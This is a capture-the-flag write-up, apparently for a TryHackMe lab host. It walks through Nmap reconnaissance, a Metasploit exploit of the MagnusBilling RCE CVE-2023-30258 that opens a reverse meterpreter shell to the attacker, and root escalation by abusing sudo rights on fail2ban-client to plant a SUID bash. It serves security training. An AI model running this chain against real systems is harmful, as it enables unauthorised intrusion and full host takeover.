Our initial Nmap scan reveals four open ports, including a web server running on port 80, a MariaDB service on port 3306, and an Asterisk Call Manager on port 5038.
┌──(kali㉿kali)-[~]
└─$ nmap -p- billing.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 11:14 IST
Nmap scan report for billing.thm (10.10.132.175)
Host is up (0.15s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5038/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 768.78 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80,3306,5038 billing.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-01 11:23 IST
Nmap scan report for billing.thm (10.10.132.175)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://billing.thm/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry
|_/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.43 seconds
The default script scan also reveals the contents of the robots.txt file, which includes a disallowed entry for the /mbilling directory.
Upon visiting the directory, we are presented with a login page. Additionally, the title of the page displays the name MagnusBilling.
A quick search reveals that MagnusBilling is an open-source VoIP billing and management system. It is designed for managing SIP trunks, VoIP calls, and customer billing, offering tools for call routing, monitoring, and invoicing.
Initial Access
MagnusBilling is affected by an unauthenticated remote command execution vulnerability, identified as CVE-2023-30258. This vulnerability can be exploited manually, but it is also available as a module within the Metasploit Framework.
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: The use command supports fuzzy searching to try and
select the intended module, e.g. use kerberos/get_ticket or use
kerberos forge silver ticket
_________________________________________________
< This console just got 20% cooler >
-------------------------------------------------
/
/
▀▄▄▄▄▄▄▄▄ /
▀▀▄▄▄▄▄█▄▄▄▄ /
▄███▄▄▄▄██▄██ /
▄██▄█▄▄█▄▄██▄███ /
▄██▄█████▄██▄▄█▄▄ /
▄███████▄██▄▀▀▄▄██ /
██████████▄▄▄ ██▄█ /
██▄███▄███ ▀▀ ████ /
▀███▄███▄▀ ███ /
▀ ████▄▀ █▄█ /
██▄▀█ ▄▄▄▄▄▄▄▄ /
▀▄█ ▀ ▄▄█▄██████▄▄ /
▀█ ███▄█████████ /
▄███▄▄█████████ /
███████▄██████▄▀ /
█████▄▄█████████
▄▄███▄▀ █▄███████ ▄▄▄▄▄▄▄▄▄
▄▄█████ ▄█▄██▄████▄█▄█▄▄██▄▄██▄█▀
▀▄██▄▀▄▄▄███▄▄███▄██▄▄███▄▄███▄▄▄
▀▀ ▄███████████████▄▄▄██▄▄███▀▄
████▄█████████▄▄▄▄▄█▄▄▄▄▄███
███████▄█████▄▄████▄▄██▄██▀▄██
▀▀▄▄██████▄██████▄▄▄████▄▄ ▀▀▀
▄▄██████████▄▄█▄▄▄▄▄██▄▄▄
██▄█████████▄▄▄██████████
▀▀ █▄████ ███▄█▄▄▄▄▄▄▄▀▀
▄▄████ ████▄██
▀▄████ ██▄███
▀▄▄▀ ██▀█▀▀
â–ˆ
=[ metasploit v6.3.60-dev ]
+ -- --=[ 2403 exploits - 1239 auxiliary - 422 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search magnus
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.17.15.155
LHOST => 10.17.15.155
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS billing.thm
RHOSTS => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
The exploit succeeds, granting us a shell with the privileges of the asterisk user.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.17.15.155:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.132.175:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.36 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 10.10.132.175
[+] Deleted yVTKmqbADnM.php
[*] Meterpreter session 1 opened (10.17.15.155:4444 -> 10.10.132.175:51064) at 2025-04-01 11:58:54 +0530
meterpreter > shell
Process 2542 created.
Channel 0 created.
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
While exploring the system, we find another user, magnus, listed in /etc/passwd. We have access to their home directory and successfully retrieve the user flag from there.
Privilege Escalation
As the asterisk user, we can run sudo -l without a password, revealing that we have permission to execute /usr/bin/fail2ban-client with root privileges.
Fail2Ban is a security tool that monitors log files for suspicious activity, blocking IP addresses after multiple failed login attempts. It helps prevent brute-force attacks by automatically applying firewall rules.
The following resource offers various techniques for leveraging Fail2Ban to escalate privileges, potentially allowing us to gain root access.
There's an approach where you can customize a config in the config directory and place code in it to be executed with root permissions. Unfortunately, we only have read-only access to the directory and its contents.
/etc/fail2ban
We can work around this limitation by copying the configuration directory and referencing it when executing fail2ban.
In the fail2ban-client command, the -c option allows us to specify the configuration directory for Fail2Ban.
sudo fail2ban-client -c /tmp/fail2ban/ -v restart
Using the command
rsync -av /etc/fail2ban/ /tmp/fail2ban/
we recursively copy the contents of /etc/fail2ban/ to /tmp/fail2ban/.
We can follow the Exploiting Fail2Ban and Getting a Root Shell section from Juggernaut Sec to customize action.d/iptables-multiport.conf and restart the service, or alternatively, create our own configuration.
In this case, we write a custom configuration that executes a script, which then copies /bin/bash to /tmp/bash and sets it as a SUID binary, allowing us to obtain a root shell.
After running the script, we have a SUID binary located at /tmp/bash. By executing it with the -p parameter, we gain a root shell. From there, we find the root flag at /root/root.txt.
